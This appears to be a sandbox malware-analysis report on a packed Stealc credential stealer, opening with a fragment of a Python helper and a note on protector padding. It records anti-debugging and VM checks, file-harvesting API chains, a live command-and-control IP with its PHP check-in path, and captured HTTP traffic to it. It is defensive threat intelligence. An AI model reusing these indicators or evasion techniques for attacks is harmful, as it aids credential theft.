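def summarize(lines):
    pairs = [parse_line(l) for l in lines]
    return {
        "pairs": len(pairs),
        "chains": [len(c) for c in chains(pairs)],
        "padding_only": sum(1 for p in pairs if not p.payload),
        "payload": {f"{p.first:X}": p.payload for p in pairs if p.payload},
    }


if __name__ == "__main__":
    import json
    print(json.dumps(summarize(SAMPLE_LINES), indent=2))
```

Run against the full list above, almost every entry comes out as padding only: register saves, pushad/popad pairs and conditional jumps wrapped around the reads, with the few entries that do real work (D9CE27 dereferencing a stack slot, 5410309 setting up a frame) belonging to the surrounding unpacking code. That shape, together with the `Oreans.vxd` and `Software\WinLicense` strings reported further down, points at a commercial protector (Oreans' WinLicense/Themida) wrapping the stealer, so the timing checks are the protector's and will look the same on unrelated samples packed with it.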
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CA652F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CD2B74 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: CBE5E7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_008B38B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_008B4910
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008ADA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_008ADA80
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008AE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_008AE430
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008AED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_008AED20
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_008B4570
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008AF68A FindFirstFileA, 0_2_008AF68A
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008B3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_008B3EA0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008AF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_008AF6B0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008A16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_008A16D0
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008ADE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_008ADE10
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008ABE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_008ABE70
                Source: C:\Users\user\Desktop\file.exe Code function: 0_2_008A1160 GetSystemInfo,ExitProcess, 0_2_008A1160
                Source: file.exe, file.exe, 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.2086459115.0000000001451000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW0
                Source: file.exe, 00000000.00000002.2086459115.0000000001483000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13630
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13685
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13649
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13633
                Source: C:\Users\user\Desktop\file.exe API call chain: ExitProcess graph end node graph_0-13645
                Source: C:\Users\user\Desktop\file.exe System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe File opened: SICE
                Source: C:\Users\user\Desktop\file.exe File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008A45C0 VirtualProtect ?,00000004,00000100,000000000_2_008A45C0
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_008B9860
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B9750 mov eax, dword ptr fs:[00000030h]0_2_008B9750
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_008B78E0 GetProcessHeap,RtlAllocateHeap,GetComputerNameA,0_2_008B78E0
                Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 5064, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B9600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle, | 0_2_008B9600
Source: file.exe, file.exe, 00000000.00000002.2085054907.0000000000C8A000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Program Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, | 0_2_008B7B90
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B7980 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA, | 0_2_008B7980
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B7850 GetProcessHeap,RtlAllocateHeap,GetUserNameA, | 0_2_008B7850
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_008B7A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, | 0_2_008B7A30

                Stealing of Sensitive Information

Source: Yara match | File source: 0.2.file.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2044296444.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5064, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

Source: Yara match | File source: 0.2.file.exe.8a0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000003.2044296444.0000000005280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2084582320.00000000008A1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5064, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 11 Native API | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 33 Virtualization/Sandbox Evasion | LSASS Memory | 641 Security Software Discovery | Remote Desktop Protocol | Data from Removable Media | 2 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 11 Disable or Modify Tools | Security Account Manager | 33 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 13 Process Discovery | Distributed Component Object Model | Input Capture | 12 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 Account Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 1 System Owner/User Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 12 Software Packing | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 DLL Side-Loading | Proc Filesystem | 324 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Source | Detection | Scanner | Label | Link
file.exe | 100% | Avira | TR/Crypt.TPM.Gen |
file.exe | 100% | Joe Sandbox ML | |
                No Antivirus matches
                No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/ | true | | unknown
http://185.215.113.37/e2b1563c6670f193.php | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://185.215.113.37/e2b1563c6670f193.php6Y3 | file.exe, 00000000.00000002.2086459115.0000000001469000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37 | file.exe, 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
http://185.215.113.37DW | file.exe, 00000000.00000002.2086459115.000000000140E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
http://185.215.113.37/e2b1563c6670f193.phpOF | file.exe, 00000000.00000002.2086459115.0000000001469000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.215.113.37 | unknown | Portugal | | 206894 | WHOLESALECONNECTIONSNL | true
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1520803
                            Start date and time:2024-09-27 23:13:10 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 2m 46s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:2
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:file.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 81%
                            • Number of executed functions: 20
                            • Number of non-executed functions: 83
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Stop behavior analysis, all processes terminated
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe
                            No simulations
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
185.215.113.37 | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37/e2b1563c6670f193.php
                            No context
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
WHOLESALECONNECTIONSNL | file.exe | Get hash | malicious | Amadey, Stealc, Vidar | Browse | 185.215.113.103
 | file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Amadey | Browse | 185.215.113.16
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Stealc, Vidar | Browse | 185.215.113.37
 | file.exe | Get hash | malicious | Amadey, BitCoin Miner, SilentXMRMiner | Browse | 185.215.113.16
 | file.exe | Get hash | malicious | Stealc | Browse | 185.215.113.37
 | kYpONUhAR5.exe | Get hash | malicious | RedLine | Browse | 185.215.113.67
 | file.exe | Get hash | malicious | LummaC, Amadey, CryptOne, LummaC Stealer, PureLog Stealer, RedLine, Stealc | Browse | 185.215.113.103
                            No context
                            No context
                            No created / dropped files found
                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):7.948955789166306
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:file.exe
                            File size:1'871'872 bytes
                            MD5:725d70229eb4ef1cb992cafa8a031527
                            SHA1:69af2b2f4a85e3ce78f5b9a9484bb7a3f13ca5ff
                            SHA256:edc9cb8db3fafd7737aeda3122a8a4b967cf4e79887ef38910dcfd6b2e99b635
                            SHA512:82ee65d8dd9a3df36cb0066b006e0325dbea7562a128dada34ce17c9a4ecefcaa946a38d8cb217e72dde846105b4fedb9578efe1ba9aa2c2cdb98a68e9bbc44d
                            SSDEEP:24576:s3YfdVGyDhuNhFw7ZjAspUvOlC/tqo19VX4hL0b+x4jE8FjC2JthFdRKOrZWa:HgyQsYOKh9l4bx4jEOzhFnBZ
                            TLSH:CF8533049D51EAFEDA6CF7FC305608C477E256A192795CBC13AA31B60862F4A3F05E9C
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L.../..f...........
                            Icon Hash:00928e8e8686b000
                            Entrypoint:0xaae000
                            Entrypoint Section:.taggant
                            Digitally signed:false
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp:0x66F1BA2F [Mon Sep 23 18:57:51 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:5
                            OS Version Minor:1
                            File Version Major:5
                            File Version Minor:1
                            Subsystem Version Major:5
                            Subsystem Version Minor:1
                            Import Hash:2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            jmp 00007FB97C88DF7Ah
                            movd mm3, dword ptr [eax+eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            jmp 00007FB97C88FF75h
                            add byte ptr [edx], al
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], dl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ebx], cl
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [ecx], al
                            add byte ptr [eax], 00000000h
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, byte ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            push es
                            or al, byte ptr [eax]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax+eax*4], cl
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add cl, byte ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            and byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            and dword ptr [eax], eax
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            adc byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add ecx, dword ptr [edx]
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            xor byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add byte ptr [eax], al
                            add dword ptr [eax+00000000h], eax
                            add byte ptr [eax], al
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x25b000 | 0x22800 | 7351ae06287288eaaea5ec27b20e263c | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x25e000 | 0x2ac000 | 0x200 | 8d350a2119b7d8c3daf26402eec516cc | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
mpdgfduh | 0x50a000 | 0x1a3000 | 0x1a2c00 | 67586c60b93239c99ad63d638730adbb | False | 0.9948087686567164 | data | 7.9541059476777995 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
rbtrtnga | 0x6ad000 | 0x1000 | 0x600 | 723b6c0ab6c2ff866f8943004b129696 | False | 0.5807291666666666 | data | 5.01932256252331 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x6ae000 | 0x3000 | 0x2200 | 5bdb009cc9dc51e034210f4dcf25455b | False | 0.06376378676470588 | DOS executable (COM) | 0.8130962823806491 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-27T23:14:03.397773+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 27, 2024 23:14:02.371526003 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Sep 27, 2024 23:14:02.376549006 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Sep 27, 2024 23:14:02.376629114 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Sep 27, 2024 23:14:02.376786947 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Sep 27, 2024 23:14:02.381823063 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Sep 27, 2024 23:14:03.118787050 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Sep 27, 2024 23:14:03.118892908 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Sep 27, 2024 23:14:03.133856058 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Sep 27, 2024 23:14:03.139952898 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Sep 27, 2024 23:14:03.397661924 CEST | 80 | 49704 | 185.215.113.37 | 192.168.2.5
Sep 27, 2024 23:14:03.397773027 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
Sep 27, 2024 23:14:07.552277088 CEST | 49704 | 80 | 192.168.2.5 | 185.215.113.37
                            • 185.215.113.37
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 185.215.113.37 | 80 | 5064 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Sep 27, 2024 23:14:02.376786947 CEST | 89 | OUT |
GET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
Sep 27, 2024 23:14:03.118787050 CEST | 203 | IN |
HTTP/1.1 200 OK
                            Date: Fri, 27 Sep 2024 21:14:03 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
Sep 27, 2024 23:14:03.133856058 CEST | 412 | OUT |
POST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----CAEHDBAAECBFHJKFCFBF
                            Host: 185.215.113.37
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
